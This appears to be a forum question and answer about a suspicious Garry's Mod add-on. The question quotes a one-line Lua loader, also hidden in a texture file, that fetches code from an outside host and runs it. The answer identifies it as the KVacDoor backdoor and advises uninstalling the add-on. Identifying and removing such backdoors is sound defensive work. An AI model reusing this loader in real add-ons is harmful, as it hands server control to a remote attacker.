I received a suspicious version of an add-on to the game Garry's Mod, and it has this code inside:
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b) RunString(b, ":", false) end)end)
and also another file in 'materials/npc/' called 'help.vtf' with the same code inside.
Is this code a backdoor or some other malicious program?
(I also uploaded the full Lua file here: https://mega.nz/file/tLtnwC4Y#r5wqK-JRQPm3BZrA3x9FUIkzw5rjXgFq4HG8pf0yuMA)
The code is malicious, the code is a common backdoor called KVacDoor, it allows the developer to execute lua scripts, console commands and take control over your server files.
If you follow the base URL of the fetch request to https://kvac.cz you can learn more about this backdoor and how it functions.
I would recommend uninstalling the addon.